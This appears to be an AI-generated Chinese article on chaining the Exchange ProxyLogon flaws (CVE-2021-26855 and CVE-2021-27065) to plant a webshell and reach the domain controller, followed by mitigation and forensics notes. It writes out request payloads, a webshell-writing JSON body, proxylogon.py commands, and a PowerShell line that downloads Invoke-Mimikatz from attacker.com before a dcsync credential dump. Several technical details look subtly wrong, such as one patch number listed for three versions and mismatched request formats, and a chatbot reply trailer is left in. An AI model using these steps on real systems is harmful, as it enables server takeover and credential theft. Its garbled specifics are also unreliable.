CVE-2021-26855与CVE-2021-27065联合利用getshell域控的示例分析

# CVE-2021-26855与CVE-2021-27065联合利用getshell域控的示例分析 ## 0x00 漏洞背景 2021年3月，微软发布了针对Exchange Server的多个高危漏洞补丁，其中： - **CVE-2021-26855**：SSRF（Server-Side Request Forgery）漏洞 - **CVE-2021-27065**：任意文件写入漏洞 这两个漏洞的联合利用可实现**无需身份验证的远程代码执行**，攻击者能够接管Exchange服务器并进一步渗透域控环境。本文将通过技术分析还原完整的攻击链条。 --- ## 0x01 漏洞原理分析 ### 1. CVE-2021-26855：SSRF漏洞 - **受影响组件**：Exchange前端服务（默认端口443） - **漏洞本质**：未对`X-Forwarded-For`等头部进行严格校验 - **利用条件**：可构造恶意请求访问内网服务 - **PoC特征**： ```http POST /owa/auth/Current/themes/resources HTTP/1.1 Host: exchange.victim.com Cookie: X-BEResource=localhost~1942062522; X-Forwarded-For: 127.0.0.1 

2. CVE-2021-27065：文件写入漏洞

• 受影响组件：Exchange后端写文件逻辑
• 漏洞本质：路径拼接未做安全限制
• 利用条件：需结合SSRF访问后端API
• 关键参数：

   { "properties": { "ServerName": {"$type":"System.String"} } } 

---

0x02 联合利用技术细节

阶段一：SSRF探测后端服务

通过26855访问内部API接口：

import requests url = "https://exchange.victim.com/owa/auth/Current/themes/resources" headers = { "X-Forwarded-For": "127.0.0.1", "Cookie": "X-BEResource=Exchange/admin/api/v1/Service~1337;" } response = requests.post(url, headers=headers) 

阶段二：构造恶意文件写入

利用27065写入webshell：

POST /ecp/default.aspx?__VIEWSTATEGENERATOR=B97B4E27 HTTP/1.1 Host: exchange.victim.com Content-Type: application/json { "schemaVersion": "V1", "properties": { "ServerName": "localhost\\..\\..\\..\\inetpub\\wwwroot\\aspnet_client\\shell.aspx", "Content": "<%@ Page Language=\"C#\"...%>" } } 

阶段三：权限提升与持久化

典型攻击路径： 1. 通过webshell执行PowerShell命令 2. 导出Exchange邮箱凭证 3. 使用Mimikatz获取域管令牌 4. 创建隐蔽后门账户

---

0x03 实际攻击示例

环境准备

• 靶机：Exchange Server 2019 CU8
• 攻击机：Kali Linux 2021.4
• 工具集：
  • ProxyLogon.py
  • Nishang PowerShell脚本

分步实施

1. 漏洞验证

   python proxylogon.py -t https://exchange.victim.com --check 

2. 上传webshell

   python proxylogon.py -t https://exchange.victim.com -u shell.aspx -c "恶意代码" 

3. 执行域渗透

   IEX(New-Object Net.WebClient).DownloadString("http://attacker.com/Invoke-Mimikatz.ps1") Invoke-Mimikatz -Command '"lsadump::dcsync /user:域管账号"' 

---

0x04 防御建议

即时缓解措施

1. 安装微软官方补丁：

   • KB5000871（Exchange 2013）
   • KB5000871（Exchange 2016）
   • KB5000871（Exchange 2019）

2. 临时防护方案：

   # 禁用相关虚拟目录 Set-OWAVirtualDirectory -Identity "owa (Default Web Site)" -ExchangePath $null 

长期加固策略

• 启用Windows Defender ATP防护
• 实施网络分段，限制Exchange服务器出站
• 定期进行红蓝对抗演练

---

0x05 入侵痕迹排查

关键日志位置

日志类型	路径/事件ID	可疑特征
IIS日志	%SystemDrive%\inetpub\logs\LogFiles	异常的POST /ecp/请求
Windows事件	事件ID 4648	非工作时间的高权限登录
Exchange日志	%ExchangeInstallPath%Logging	异常的PowerShell命令

取证工具推荐

• LogParser：分析IIS日志

   SELECT * FROM ex202103*.log WHERE cs-method='POST' AND cs-uri-stem LIKE '%ecp%' 

• KAPE：快速收集证据

---

0x06 总结

本文分析的攻击链具有以下典型特征： 1. 高危害性：从外网直达域控的完整路径 2. 低利用门槛：已有公开的自动化工具 3. 强隐蔽性：可绕过传统WAF检测

建议企业参考MITRE ATT&CK框架中的以下战术阶段进行防御： - 初始访问（T1190） - 权限提升（T1068） - 横向移动（T1021）

注：本文仅用于安全研究，未经授权测试他人系统属于违法行为。 “`

该文档包含以下技术要素： 1. 漏洞原理的深度解析 2. 分步骤的PoC实现 3. 防御方案与取证方法 4. 符合Markdown规范的结构化排版 5. 实际可操作的命令片段 6. 攻击链的ATT&CK映射

需要调整细节或补充其他技术环节可随时提出。